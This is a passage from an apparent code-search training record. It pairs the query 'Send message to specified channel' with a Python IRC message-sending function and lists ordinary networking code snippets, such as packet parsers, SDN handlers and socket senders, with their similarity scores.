0:\n self.handle_pkt(None)\n buf = buf[4:]\n elif size <= len(buf):\n self.handle_pkt(buf[4:size])\n buf = buf[size:]\n else:\n break\n self._readahead = BytesIO()\n self._readahead.write(buf)", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n # if packet.is_fin:\n # print(\"2nd wan sees a fin\")\n\n if packet.is_fin and len(packet.payload) == 0:\n # print(\"empty fin, foward fin\")\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash not in self.hash_to_raw_data.keys():\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = False)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # reset buffer\n self.send(packet, self.address_to_port[packet.dest]) # forward empty fin\n return\n \n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n \n if packet.is_raw_data:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n pack_buff += packet.payload\n\n 
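The `parse(self, data)` snippet above consumes frames carrying a 4-hex-digit length prefix, with a size of 0 acting as a flush marker. A standalone sketch of that framing loop, written as a generator so a partial trailing frame can be re-buffered by the caller (the function name is an assumption, not from the snippet):

```python
# Assumed sketch of the 4-hex-digit length-prefixed framing parsed above.
def iter_pkt_lines(buf: bytes):
    pos = 0
    while pos + 4 <= len(buf):
        size = int(buf[pos:pos + 4], 16)
        if size == 0:                  # flush marker: no payload
            yield None
            pos += 4
        elif pos + size <= len(buf):   # complete frame available
            yield buf[pos + 4:pos + size]
            pos += size
        else:                          # partial frame: caller buffers the remainder
            break
```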
block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n # print(\"sending1\")\n if block_hash in self.hash_to_raw_data.keys():\n # send extract data from hash in packet\n block_to_send = self.hash_to_raw_data[block_hash]\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n\n if remaining_buff:\n # print(\"wan to client remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n block_hash = get_hash(remaining_buff)\n block_to_send = remaining_buff\n # print(\"sending2\")\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n # print(\"sending fin1\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n if packet.is_fin:\n # print(\"sending fin2\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff\n else:\n block_hash = packet.payload\n block_to_send = self.hash_to_raw_data[block_hash]\n # print(\"sending3\")\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n if packet.is_fin:\n # print(\"sending fin3\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n # self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # TESTING\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_fin and len(packet.payload) == 0:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = True)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n self.send(packet, self.wan_port)\n return\n\n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n\n pack_buff += packet.payload\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n\n # send off all completed blocks\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n\n if remaining_buff:\n # print(\"wan to wan remaining_buff: \" + remaining_buff)\n if 
packet.is_fin:\n # print(\"finfin\")\n block_to_send = remaining_buff\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.wan_port)\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n\n # Comment out the following line and uncomment the one after\n # when starting the exercise.\n # self.act_like_hub(packet, packet_in)\n # self.act_like_switch(packet, packet_in)\n self.act_like_router(packet, packet_in)", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect 
decapsulation'\n print(\"Correct decapsulation\")", "def _process_frame(self, timestamp: Timestamp, frame: SerialFrame) -> None:\n assert frame.data_specifier == self._specifier.data_specifier, \"Internal protocol violation\"\n self._statistics.frames += 1\n\n transfer: typing.Optional[pyuavcan.transport.TransferFrom]\n if frame.source_node_id is None:\n transfer = TransferReassembler.construct_anonymous_transfer(timestamp, frame)\n if transfer is None:\n self._statistics.errors += 1\n _logger.debug(\"%s: Invalid anonymous frame: %s\", self, frame)\n else:\n transfer = self._get_reassembler(frame.source_node_id).process_frame(\n timestamp, frame, self._transfer_id_timeout\n )\n if transfer is not None:\n self._statistics.transfers += 1\n self._statistics.payload_bytes += sum(map(len, transfer.fragmented_payload))\n _logger.debug(\"%s: Received transfer: %s; current stats: %s\", self, transfer, self._statistics)\n try:\n self._queue.put_nowait(transfer)\n except asyncio.QueueFull: # pragma: no cover\n # TODO: make the queue capacity configurable\n self._statistics.drops += len(transfer.fragmented_payload)", "def setupPacket(self):\n return None", "def _send_packet(self, packet: bytes):\n self._transport.sendto(packet, self._caddr)", "def __handle_message_packet(self, packet: Packet):\n log(f'New message arrived: {packet.get_body()}')\n sender_address = packet.get_source_server_address()\n updated_packet = PacketFactory.new_message_packet(packet.get_body(), self.address)\n if self.__check_neighbour(sender_address): # From known source\n for neighbor_address in [*self.children_addresses, self.parent_address]:\n if neighbor_address is not None and neighbor_address != sender_address:\n self.stream.add_message_to_out_buff(neighbor_address, updated_packet)", "def _decode_frame(self):\n\n self._processed.eth_frame.log(level=logging_helper.INFO)\n\n # Parse IP packets, protocol=0x8\n if hex(self._processed.eth_frame.protocol) == u'0x8':\n self._processed.ip_frame = IPFrame(self._processed.eth_frame.payload)\n self._processed.ip_frame.log(level=logging_helper.INFO)\n\n if self._processed.ip_frame.payload is not None:\n self._processed.ip_frame.payload.log(level=logging_helper.INFO)\n\n else:\n logging.info(u'Not an IP payload')\n\n logging.info(self._processed)", "def process(self, hdr: PacketHeader, payload: bytes):\n self._last_activity_time = time.monotonic()\n txid = hdr.trans_num.value\n\n if hdr.flags & PacketFlags.PING:\n hdr.flags |= PacketFlags.REPLY\n self._send_packet(hdr.serialize())\n return\n\n # Ignore requests with txids corresponding to executing tasks.\n if txid in self._tmgr:\n return\n\n # Otherwise, create task to run oserver.\n self._tmgr.create_task(txid, self._oserver.process(hdr, payload))", "def processevent(self,pktEvent):\n raise NotImplementedError()", "def _parse_interface(self, interface_data):\n # Look for inputs\n for mo in re.finditer(self._INPUT_RE, interface_data):\n self._inputs.append(Input(mo.group(\"name\"), self.parse_width(mo.group(\"width\"))))\n # Look for outputs\n for mo in re.finditer(self._OUTPUT_RE, interface_data):\n self._outputs.append(Output(mo.group(\"name\"), self.parse_width(mo.group(\"width\"))))", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))\n return False", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # 
this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n logger.info(\"Address {} at {} wrote: '{}'\".format(self.client_address[1], self.client_address[0], data))\n cmd_strn, ret = self.command_service(data)\n print(ret)\n self.command_response(cmd_strn, ret, self.request[1], self.client_address[0],\n self.mapInterface.router[cmd_strn])", "def process(self, data):\n if self.__head:\n self.__head.send(Element(\n stream_id=self.id,\n data=data))", "def _parse(self) -> bool:\n\n # First, check if this packet has a '!' at an offset position\n # This is allowed as per APRS 1.01 C5 P18\n if hasattr(self, '_offset'):\n # Packets with the '!' offset do not have a timestamp or messaging capabilities\n # Chop everything off the info field before the '!'\n self._info = self._info[self._offset:]\n\n elif self.data_type_id == '!':\n # Packet has no timestamp, station has no messaging capability\n self.timestamp = None\n self.messaging = False\n\n elif self.data_type_id == '/':\n # Packet has timestamp, station has no messaging capability\n self.messaging = False\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n elif self.data_type_id == '=':\n # Packet has no timestamp, station has messaging capability\n self.timestamp = None\n self.messaging = True\n\n elif self.data_type_id == '@':\n # Packet has timestamp, station has messaging capability\n self.messaging = True\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n else:\n # This isn't a position packet\n raise ParseError(\"Unknown position data type: {}\".format(self.data_type_id))\n\n if self.timestamp is None:\n data = self._info\n else:\n data = self._info[7:]\n\n # Check to see if the position data is compressed or uncompressed\n if re.match(r'[0-9\\s]{4}\\.[0-9\\s]{2}[NS].[0-9\\s]{5}\\.[0-9\\s]{2}[EW]', data):\n # Parse the uncompressed position values from the information field\n (self.latitude, self.longitude, self.ambiguity, self.symbol_table, self.symbol_id\n ) = self._parse_uncompressed_position(data)\n\n # Ensure compressed is set to False\n self.compressed = False\n\n if len(data) > 19:\n # This packet has additional data in the information field, so attempt to parse it\n (phg, radio_range, dfs, self.course, self.speed, self.altitude,\n comment) = self._parse_data(data[19:])\n\n if self.symbol_table == \"/\" and self.symbol_id == \"\\\\\":\n # If the symbol table is /, and the symbol ID is \\, it implies a DF report\n # 26th and 30th characters should be /\n logger.debug(\"Symbol table and symbol indicates a DF report\")\n\n if len(comment) < 8:\n # Packets with DF information must be at least 8 characters long\n raise ParseError(\"Missing DF values\")\n\n if comment[0] != \"/\" or comment[4] != \"/\":\n # Packets with DF information must also include the bearing and NRQ values\n # See APRS 1.01 C7 P30\n raise ParseError(\n \"Invalid DF values (character in position 0 and 4 should be '/'\"\n )\n\n # Extract the bearing\n self.bearing = int(comment[1:4])\n logger.debug(f\"DF bearing is {self.bearing} degrees\")\n\n # Decode the NRQ value\n (self.number, 
self.df_range, self.quality) = APRSUtils.decode_nrq(comment[5:8])\n\n # Strip the bearing/NRQ value from the comment\n self.comment = comment[8:]\n\n elif self.symbol_table in [\"/\", \"\\\\\"] and self.symbol_id == \"_\":\n # / or \\, and _ for the symbol table and symbol implies a weather report\n # TODO - Implementation\n logger.debug(\"Symbol table and symbol indicates a weather report\")\n\n elif phg:\n # Decode the power, height, gain and directivity values\n (self.power, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_phg(phg)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif radio_range:\n # The radio range is specified as 4 digits, which denote the range in miles\n self.radio_range = int(radio_range)\n logger.debug(f\"Radio range is {radio_range} miles\")\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif dfs:\n # Decode the signal strength, height, gain and directivity values\n (self.strength, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_dfs(dfs)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n else:\n # No additional data found\n self.comment = comment\n\n else:\n # Parse the compressed position values from the information field\n\n # Get the compressed position\n compressed_position = data[0:13]\n\n try:\n (self.latitude, self.longitude, self.altitude, self.course, self.speed,\n self.radio_range, self.compression_fix, self.compression_source,\n self.compression_origin) = self._parse_compressed_position(compressed_position)\n\n except Exception as e:\n # TODO Catch specific errors (for example, OverflowError)\n raise ParseError(\"Couldn't parse compressed position: {}\".format(e))\n\n # Ensure compressed is set to True\n self.compressed = True\n\n # Parse the symbol table and symbol ID\n self.symbol_table = data[0]\n self.symbol_id = data[9]\n\n # TODO - parse altitude information\n\n self.comment = data[13:]\n logger.debug(\"Comment is {}\".format(self.comment))\n\n # If we get this far, then we've parsed the packet\n return True", "def handle_rpc(self):\n while True: # loop handling\n self.rbuf.seek(0)\n length_prefix = self.rbuf.read(4)\n if len(length_prefix) < 4: # half-package\n break\n\n try:\n length, = struct.unpack(\"I\", length_prefix.encode(\"utf-8\"))\n except Exception as e:\n print(e.__traceback__)\n body = self.rbuf.read(length)\n if len(body) < length: # half-package\n break\n\n request = json.loads(body)\n input = request[\"in\"]\n params = request[\"params\"]\n handler = self.handlers[input]\n handler(params)\n # cut read buffer\n left = self.rbuf.getvalue()[length + 4:]\n self.rbuf = StringIO()\n self.rbuf.write(left)\n # move position to EOF\n self.rbuf.seek(0, 2)", "def process_incoming_packet(self, data, address):\n try:\n new_message = MessageFactory.create_message(\n packet_data=data,\n origin_address=address,\n destination_node=self.node)\n self._put_new_message_in_queue(new_message)\n self.report()\n if new_message.TYPE_STRING != \"ack\":\n ack_message = MessageFactory.generate_ack_message(new_message)\n self.send_message(ack_message)\n except Exception as e:\n print(e)", "def __processMsg(self, sock, msgData):\n\n pass", "def forward(self, srcif, packet):\n # packet is already decoded\n def send_no_route():\n send_src = srcif[:-1]\n send_src += '1'\n self.sockets[srcif].send(json.dumps({\n SRCE: send_src,\n DEST: packet[SRCE],\n TYPE: NRTE,\n MESG: {}\n }).encode())\n # GEt 
correct route.\n sock_addr = self.get_route(srcif, packet[DEST])\n\n # If no route available, send no route message back\n if sock_addr == None:\n send_no_route()\n else:\n sock = self.sockets[sock_addr]\n # If socket is available, send to proper neighbor.\n sock.send(json.dumps(packet).encode())\n return False", "def __handle_pkt(self, current_client, pkt_type, data):\n try:\n self.__pkt_handlers[pkt_type](current_client, data)\n except KeyError:\n self.__logger.error(\"Got an invalid packet type from client: {}\".format(pkt_type))\n except Exception as e:\n self.__logger.exception(e)\n self.__logger.error(\"General exception occurred while handling packet: {}\".format(e))" ]
[ "0.8039347", "0.7425329", "0.6986574", "0.69667333", "0.6850102", "0.66773987", "0.65571284", "0.655704", "0.65034556", "0.64887303", "0.64614993", "0.64393044", "0.6438453", "0.6343893", "0.633845", "0.63383657", "0.62919194", "0.62790996", "0.626932", "0.6252799", "0.62515205", "0.6150356", "0.6140259", "0.61376816", "0.61369246", "0.6134787", "0.6110328", "0.61094725", "0.6091059", "0.6082074", "0.6081094", "0.60610044", "0.6042554", "0.60395706", "0.601952", "0.60103226", "0.6002915", "0.59936154", "0.59887695", "0.5957948", "0.5948165", "0.5927946", "0.59218305", "0.58836675", "0.58583695", "0.5848591", "0.58457667", "0.58453786", "0.58269376", "0.58263665", "0.5821455", "0.5815113", "0.5802662", "0.5783231", "0.57773083", "0.5767768", "0.57489586", "0.57467645", "0.57412434", "0.57224965", "0.5718748", "0.57045317", "0.56957763", "0.5689442", "0.5681588", "0.5672476", "0.5671936", "0.56416446", "0.5635416", "0.5627622", "0.56256664", "0.5623273", "0.5614938", "0.5576078", "0.55746", "0.5567835", "0.55611855", "0.55472434", "0.5544512", "0.55314016", "0.5530043", "0.55247056", "0.55172443", "0.55159783", "0.5514667", "0.5509243", "0.5489798", "0.5487399", "0.54849535", "0.54808086", "0.54800713", "0.54708606", "0.54686505", "0.5463116", "0.54623103", "0.54593486", "0.5457075", "0.543812", "0.5431981", "0.54243064" ]
0.7235204
2
Send message to specified channel.
def sendmsg(msg, target=channel):
    msg = bytes('PRIVMSG ' + target + ' :' + msg + '\n', 'UTF-8')
    sleep(randint(5, 10) / 10)  # to avoid throttling due to flooding
    write(msg)
    ircsocket.send(msg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def send_message(self, channel : str, message : str):\n await self._connection.send_message(channel, message)", "def sendMsg(self, channel, message, length=None):\n self.logger.info(\"Sending in %s: %s\" % (channel, message))\n self.msg(channel, message, length)", "def send_message(self, channel, text):\n if not channel:\n return\n self.post('chat.postMessage', data={\"channel\": channel, \"text\": text})", "def send_chat_message(self, channel, message):\r\n self._send(\"PRIVMSG #{0} :{1}\".format(channel, message))", "def send_message(self, message, channel=None):\n if channel is None:\n channel = self.default_channel\n\n self._slack_client.api_call(\n \"chat.postMessage\", channel=channel, text=message)", "def send(self, msg):\n return self._channel_action(msg, 1)", "def send_message(channel, message):\n slack_client = get_client()\n slack_client.chat_postMessage(channel=channel, text=message, as_user=True)", "def msg_chan_send(channel, value, version = NATIVE_HEADER_VERSION, order=\"<\"):\n return message_no_reply(CHAN_SEND, channel, value, version, order)", "def send_channel(self, text, channel_id, **kwargs):\n\n data = {\"content\": text}\n data.update(kwargs)\n self._post_json(f\"channels/{channel_id}/messages\", data)", "async def send(self, channel=None, **kwargs):\n\n if \"user\" in kwargs:\n api_call = self.client.chat_postEphemeral\n\n else:\n api_call = self.client.chat_postMessage\n\n return await api_call(\n channel=channel or self.channel,\n # contents of messenger[UserDict]\n **self,\n # any other API fields provided by Caller\n **kwargs,\n )", "async def test_send_to_channel(self):\n message = \"Test basic message.\"\n await self.cog.send_message(message, *self.text_channels, alert_target=False)\n\n self.text_channels[0].send.assert_awaited_once_with(message)\n self.text_channels[1].send.assert_not_called()", "def send_message(channel, data):\n try:\n socketio.emit(channel, data)\n logging.info('Message was sent.')\n logging.debug(data)\n except Exception as e:\n logging.error(e)\n logging.error(\"Can't send message. 
Exeption occured\")", "def join_channel(self, channel):\r\n self._send('JOIN #%s\\r\\n' % channel)", "def publish(self, channel: str, message):\n raise TypeError(\"{} - publish not implemented!\")", "def send_part(self, channel) -> None:\n\n self.send_line('PART {}'.format(channel))", "def send_user_message(self, channel_id, message):\n self.slack_client.api_call('chat.postMessage', as_user='true', channel=channel_id, text=message)", "def sendChatMessage(self, msg):\n self.transport.write(msg)", "async def say(self, ctx, text_channel: typing.Union[discord.TextChannel, str] = None, *, message=None):\n if not text_channel:\n return await ctx.send(f\"> **{ctx.author.display_name}, Please specify a message to send.**\")\n if isinstance(text_channel, str):\n if message:\n message = f\"{text_channel} {message}\"\n else:\n message = text_channel\n text_channel = ctx\n await text_channel.send(message)", "def msg(self, chan, msg):\n self._msg(chan, msg)", "def send_message(self, message: str):\n self.client.chat_postMessage(\n channel=f\"@{self.username}\", text=message,\n )", "def send(self, message):\n if self.connection:\n self.connection.send(message)", "async def send_discord(msg, cnl):\n await bot.wait_until_ready()\n await bot.send_message(bot.get_channel(cnl), msg)", "def sendMessage(sock, message):\n messageTemp = \"PRIVMSG \" + channel +\" :\" +message\n sock.send((messageTemp+ \"\\n\").encode())", "async def send_initial_message(self, ctx: Context, channel: discord.TextChannel) -> discord.Message:\n\n return await channel.send(embed=self.embed)", "def publish(self, channel: str, content: str) -> None:\n print(f\"{self._name} publishes message '{content}' to \"\n f\"channel-[{channel}]\")\n self._server.route(channel, content)", "def send(self, msg):\n sleep(self.m_to)\n self.conn.send(msg)", "async def send_message(self, message: dict) -> None:\n await self.client.chat_postMessage(channel=self.channel_id, **message)", "async def channel(self, ctx: commands.Context, channel: discord.TextChannel):\n self.channel = str(channel.id)\n await self._update_db()\n\n await ctx.send(f\"Done! 
{channel.mention} is the Starboard Channel now!\")", "def send(self, msg):\n with self._send_lock:\n self._rt.send_message(msg.bytes())", "def send(self, send_to, subject):\n self.server.send_message(self, send_to, subject)", "def say(self, channel_name: str, text: str) -> None:\n self.connection.privmsg(channel_name, text)", "def send(self, message):\n self.sock.send(message)", "def send_whisper_message(self, channel, user, message):\r\n self._send(\"PRIVMSG #{0} :/w {1} {2}\".format(channel, user, message))", "def send_channel_message(self, status, data1=None, data2=None, ch=None):\n msg = [(status & 0xF0) | ((ch if ch else self.channel) - 1 & 0xF)]\n\n if data1 is not None:\n msg.append(data1 & 0x7F)\n\n if data2 is not None:\n msg.append(data2 & 0x7F)\n\n self._midi.send_message(msg)", "def send(self, message):\n pass", "def message_send(token, channel_id, message):\n verify_token(token)\n if not message:\n raise InputError(\"Message can't be empty\")\n if len(message) > 1000:\n raise InputError(\"Message is over 1000 characters\")\n user = get_user_from_token(token)\n selected_channel = select_channel(channel_id)\n # Raise error if the user is not a part of the channel they are trying to message in\n if not is_user_member(user, selected_channel):\n raise AccessError(description=\"User is not a member of channel with channel_id\")\n\n sent_message = Message(\n channel=selected_channel,\n user=user,\n message=message\n )\n db.session.add(sent_message)\n db.session.commit()\n return {\n \"message_id\": sent_message.id\n }", "def joined(self, channel):\n self.logger.info(\"Joined %s\" % channel)", "def send_message(self, message):\n self.send_message_queue.put(message)", "def send_message(self, message):\n pass", "def send(self, message):\n self.logger.info(\"Sending to server: %s\" % message)\n self.sendLine(message)", "def _send_msg(self, msg):\n self._kernel.comm.send(msg)", "def send(self, msg):\n self.__sock.send(msg)", "async def send(self, message):", "def send(self, messages, channel):\n # Process strings as well as iterables\n if isinstance(messages, str):\n message = messages\n else:\n message = '\\n'.join(messages)\n # Post message to output stream\n self.outputs.append([channel, message])", "def join(self, channel):\n self.channels[channel.name.lower()] = channel\n channel.protocol = self.protocol\n self.protocol.join(channel.name)", "def send_message(self, message):\n \n msgPacket = serverbound.play.ChatPacket()\n msgPacket.message = message\n self.connection.write_packet(msgPacket)", "def sendmessage(user,gameid):\n message = request.form['message']\n channel.send_message(user+gameid,message)", "def send(self, msg: str):\n\t\tself.client.send(msg.encode())", "def send_message_to_chat(channel, response):\n\n web_client.chat_postMessage(\n channel=channel,\n text=response\n )", "def send(self, msg):\n self.message('Me', msg)", "def join(self, channel):\n raise NotImplementedError", "def send_message(self, message):\n self.client.queue.put(message)", "def _send(self, message):\n self.sock.sendall('%s\\n' % message)", "def sendmessage(user,roomid):\n message = request.form['message']\n channel.send_message(user+roomid,message)", "def send(self, message) -> None:\n raise NotImplementedError", "def _send_via_transport(self, message):\n\n self.message_interface.send(message)", "def send(self, msg):\n self.house.PLM.send_queue.put( msg )", "def send(self, msg):\n self._mailbox.put(msg)", "async def send_shortlived_message(self, message, channel, duration=5):\n pass", "def part(self, 
channel, message=\"\"):\n time.sleep(1)\n self.s.send(\"PART %s%s\\n\" % (channel, (message and (\" :\" + message))))\n logger.log(\"PART %s%s\" % (channel, (message and (\" :\" + message)))).LogSend()", "def send_command(self, command):\n cmd, arg = command\n logging.debug(f'Sending \"/{cmd} {arg}\" to {self.channel_name}...')\n params = self.params\n params[\"command\"] = f\"/{cmd}\"\n params[\"text\"] = arg\n response = requests.post(self.url + \"chat.command\", params=params)\n if response.ok:\n logging.info(f'Successfully sent \"/{cmd} {arg}\" to {self.channel_name}.')\n logging.debug(response.json())\n else:\n logging.info(f'Failed to send \"/{cmd} {arg}\" to {self.channel_name}.')\n logging.debug(response.json())\n return response.status_code", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, message):\n _check_message_type(message=message)\n response = requests.post(\n self._server_url + _SEND_URL,\n data={\"id\": self._chat_id, \"msg\": message}\n )", "async def join(self, channel : str):\n # todo: check if # is required. If it is, append it at the start if DNE.\n await self._connection.join(channel)", "def send_message(self, message):\n source_guid = str(uuid.uuid1())\n date = time.strftime(\"%H:%M:%S\")\n self.api.send_message(\n self.conversation_type,\n self.cid,\n source_guid,\n message[:1000]\n )\n if self.api.send_message(self.conversation_type, self.cid, source_guid, message):\n self.append_message(source_guid, 'me', date, message[:1000])\n if len(message) > 1000:\n self.send_message(message[1000:])", "def send_slack(self, message):\n self.slack_client.api_call('chat.postMessage', channel=self.slack_channel, text=message, username=self.username, icon_emoji=self.slack_icon_emoji)\n print(\"Slack Notification sent\")", "def _send(self, message):\n logger.info(message)\n self.buffer.put(message)", "def send(self, msg: Message, **kwargs):\n\n pass", "def send_irc_message(self, event):\n\n self.log('Transmitting IRC message', lvl=debug)\n\n self.fireEvent(PRIVMSG(event.username, \"[%s] %s : %s\" % (event.msg_type, event.subject, event.body)))", "def send_message(self, cmd_id, message_type, status, message=None):\n pass", "def kick(self, nick, channel=None, message=None):\n if channel is None:\n if self._trigger.is_privmsg:\n raise RuntimeError('Error: KICK requires a channel.')\n else:\n channel = self._trigger.sender\n\n if nick is None:\n raise RuntimeError('Error: KICK requires a nick.')\n\n self._bot.kick(nick, channel, message)", "def send_message(self, message):\r\n\t\tself.__tcpSocket.write(message.encode('utf8'))", "def send(self, msg):\n #assert(isinstance(msg, Message))\n\n msg = envelp(msg, self.get_msg_id())\n self.send_raw(msg)\n\n # TODO: Fix this: this little delay is to be able to\n # send messages one after the other\n #\n # without this delay, following code is not working:\n #\n # the_actor.send({'a': 'message'})\n # the_actor.send({'a': 'different message'})\n #\n gevent.sleep(0.000000000000000000000000001)", "def send(self):\n if self._stopping:\n return\n\n mytype = 'text/plain'\n\n try:\n if isinstance(json.loads(self.message),dict):\n mytype = 'application/json'\n except (TypeError,json.JSONDecodeError):\n if (isinstance(self.message,dict)):\n mytype = 'application/json'\n self.message = json.dumps(self.message)\n else:\n self.message = str(self.message)\n\n properties = pika.BasicProperties(app_id='sender',\n content_type=mytype)\n\n self._channel.basic_publish(self.exchange, self.routing_key, 
